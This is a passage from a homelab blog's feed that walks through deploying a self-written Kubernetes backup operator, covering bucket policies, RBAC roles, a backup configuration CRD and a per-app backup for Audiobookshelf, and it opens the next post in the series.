</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/service-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/external-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Through the magic of jinja2 and some naming conventions, this policy template
will allow my service backup user to access all of the APIs needed by restic,
meaning read and write access. The second user, <code>external-backup-user</code>, is the
user I use to run backups to an external HDD. This user is more restricted than
the service backup user, because it only needs read access and never writes to
the backup buckets.</p>
<p>Short aside: Why use Ansible for the bucket creation, instead of Rook&rsquo;s
<a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">ObjectBucketClaim</a>?
Simple answer: Because of policies. Until very recently, there was no way to
configure a bucket policy via an ObjectBucketClaim, so I would have needed to
reach for Ansible or something else anyway. That&rsquo;s why I decided to go ahead and do the
bucket creation with Ansible as well.</p>
<p>Just for completeness&rsquo; sake, I also created an ExternalSecret for my restic
backup password:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;restic&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">service-backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/restic</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">password</span>
</span></span></code></pre></div><p>Incidentally, looking at the SecretStore name: I really need to stop prefixing
everything with &ldquo;homelab&rdquo; or &ldquo;hl&rdquo;. &#x1f605;</p>
<p>Last but not least, I also need a sort of scratch volume, where backed up
S3 buckets are copied to before being slurped up by restic.
It&rsquo;s a PVC looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">service-backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">50Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span></code></pre></div><p>It needs to be RWX because it&rsquo;s shared among all backups for all apps, not one
per app. So instead of my customary Ceph RBD volume, it&rsquo;s a CephFS volume.
This is one part of my backup setup I need to still improve. At some point,
fully cloning an S3 bucket to a local disk and then feeding it into restic might no longer be
feasible.</p>
<p>Anyway, that&rsquo;s all the Yak shaving necessary, let&rsquo;s look at the backup operator
itself.</p>
<h2 id="the-operator-deployment">The operator deployment</h2>
<p>Because this is an operator, the first thing to consider is what access it
needs to the k8s API. For this, I defined one Role and one ClusterRole. The
ClusterRole is necessary so the operator can access a number of resources in
all namespaces, while the Role is for things where it only needs access in
its own namespace.</p>
<p>Let&rsquo;s begin with the ClusterRole:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterRole</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-cluster-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Needed for Kopf Framework</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#ae81ff">apiextensions.k8s.io]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">customresourcedefinitions]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">list, watch]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">events]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">create]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">namespaces</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">persistentvolumes</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">persistentvolumeclaims</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;storage.k8s.io&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">volumeattachments</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;mei-home.net&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabservicebackups</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;batch&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">jobs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span></code></pre></div><p>A number of things in here are requirements from the <a href="https://github.com/nolar/kopf">kopf framework</a>
I used to implement the operator. It needs to be able to watch for CRDs because
it needs to handle them. The HomelabBackupConfigs and HomelabServiceBackups
are the two CRDs I introduced. PersistentVolumeClaims, PersistentVolumes and
VolumeAttachments are needed because that&rsquo;s what the operator backs up.
Both PersistentVolumes and VolumeAttachments are cluster level resources.
And because PVCs generally live in the namespace of the app they&rsquo;re used by,
cluster-wide access is required for the operator.
Finally, the cluster-wide access to Jobs is due to a quirk of Kopf.
I really only need to access Jobs in the operator&rsquo;s own namespace, to launch
them and monitor them. But the issue is that I&rsquo;m using Kopf&rsquo;s event handler
mechanism to watch for Job events, so I can react when a Job finishes or fails.
And Kopf only knows universal configuration when it comes to which APIs it uses.
Either the cluster level ones, or the namespaced ones. This can&rsquo;t be configured
per listener, only for the entire instance.</p>
<p>So in the end, even though I really only needed Job control over Jobs in the
same namespace, I still need to grant cluster-wide access.</p>
<p>Next, the Role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">configmaps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">delete</span>
</span></span></code></pre></div><p>I&rsquo;m creating ConfigMaps for the individual Jobs during the backup run, so I need
access. But in this case, I implemented all of the necessary access myself with
explicit API calls, without Kopf&rsquo;s involvement. This allowed me to scope the
access rights to a single namespace.</p>
<p>Then there&rsquo;s the general backup configuration, which is set with the
HomelabBackupConfig CRD. These are configuration options which don&rsquo;t differ per
app, and so can be set centrally, instead of having a block of similar config
settings in every individual app&rsquo;s backup config.
For my deployment, it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-config</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scratchVol</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3.example.com:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3.example.com:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">restic</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticRetentionPolicy</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">daily</span>: <span style="color:#ae81ff">7</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">weekly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">monthly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">yearly</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">jobNS</span>: <span style="color:#e6db74">&#34;backups&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hn-backup:5.0.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;hn-backup&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span></code></pre></div><p>This configures service backups to run every night at 01:30. It configures
the credentials and S3 servers for both, the location of the app&rsquo;s S3 buckets
and the location of the backup buckets. These are currently the same, but if
I ever run two types of S3, e.g. for some reason I decide to add a second Ceph
cluster or a MinIO instance, I can have the service and backup buckets on
different S3 servers.</p>
<p>Also of interest might be the retention policy. This keeps the backups for the
last 7 days, the backups for the Sundays of the last 6 weeks, the backups of the
last day of the month for the last 6 months and finally the backup from December
31st of the previous year.</p>
<p>Finally, there&rsquo;s the definition of the container image and command to run during
individual backups, just in case I ever decide to change my setup for the individual
backups but want to keep the operator going.</p>
<p>And here, finally, the operator&rsquo;s deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">hlbo-account</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-backup-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hl-backup-operator:1.1.0</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-d&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span></code></pre></div><p>The <code>imagePullPolicy: Always</code> is mostly for the current, still somewhat &ldquo;beta&rdquo;
phase of use, so I can easily switch to using <code>:dev</code> images. The args are all
for Kopf. The <code>-A</code> says that Kubernetes&rsquo; cluster API should be used, while
<code>-v</code> and <code>-d</code> enable lots of debug output.</p>
<p>That&rsquo;s it, operator deployed. Now onto configuring a backup.</p>
<h2 id="configuring-backups-for-my-audiobookshelf-instance">Configuring backups for my Audiobookshelf instance</h2>
<p><a href="https://www.audiobookshelf.org/">Audiobookshelf</a> was the first user-facing
workload I deployed in k8s after setting up all the monitoring and infrastructure.
It stores everything on a single PersistentVolume, including progress and listened
to episodes of all of my podcasts. As such, I only need to backup that single
PVC, and I&rsquo;m good to go.</p>
<p>Backups are configured via the HomelabServiceBackups CRD. For my Audiobookshelf,
it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-audiobookshelf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">abs-data-volume</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span></code></pre></div><p>The only configuration needed is the name of the backup bucket and a list of the S3
buckets and PVCs to be backed up.</p>
<p>In this case, my Audiobookshelf deployment only has a single PVC:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">abs-data-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">100Gi</span>
</span></span></code></pre></div><p>The operator will figure out where that volume is currently mounted and launch
a backup Job on that host.</p>
<p>And that&rsquo;s it! The backups are finally working, and by now several weeks
worth of backups were successful. It was a pretty long detour, but I did have
at least some fun writing a small-ish project that I&rsquo;m actually using.</p>
<p>The next installment of this series will come pretty soon, because I&rsquo;m already
done migrating my Drone CI instance on Nomad to a Woodpecker CI instance
on k8s. The only thing left to do is to write the blog post.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Backup Operator Part III: Running Backups</title>
      <link>https://blog.mei-home.net/posts/backup-operator-3-running-backups/</link>
      <pubDate>Fri, 10 Jan 2025 22:10:52 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/backup-operator-3-running-backups/</guid>
      <description>Implementing the actual backups</description>
      <content:encoded><![CDATA[<p>In the last couple of months, I&rsquo;ve been working on a k8s operator for running
backups of persistent volumes and S3 buckets in my cluster.
Previous installments of the series can be found <a href="https://blog.mei-home.net/tags/hlbo/">here</a>.</p>
<p>And now, I&rsquo;m finally done with it, and over the weekend, I ran the first
successful backups. Time to describe what I&rsquo;ve implemented, why and how.</p>
<h2 id="recap">Recap</h2>
<p>Let&rsquo;s start with a recap. For a more detailed description of the problem,
have a look at <a href="https://blog.mei-home.net/posts/k8s-migration-12-backup-issues/">this post in my k8s migration series</a>.</p>
<p>In short, my previous backup implementation on my Nomad cluster runs a container
on each host in the cluster. This container then checks which jobs run on the
host and backs up the volumes noted in the config file for that job.
This approach would not work on Kubernetes, because k8s does not provide an API
similar to Nomad&rsquo;s <a href="https://developer.hashicorp.com/nomad/docs/schedulers#system-batch">Sysbatch jobs</a>.
Those types of jobs launch a given container on every host in the cluster, with
a run-to-completion setup.
Kubernetes, on the other hand, only knows Jobs, which cannot be run on every host
simultaneously, and DaemonSets, which don&rsquo;t have run-to-completion semantics.</p>
<p>There would have, of course, been the easy way out: Using an existing solution.
But where&rsquo;s the fun in that?</p>
<p>So I decided to take this chance to learn the Kubernetes API a bit better,
and write my own operator. Because I&rsquo;m relatively familiar with Python,
I decided to use the <a href="https://github.com/nolar/kopf">Kopf</a> framework.</p>
<p>The end goal was to have a per-app configuration in the form of a custom resource
definition which tells the operator which volumes and buckets need to be backed
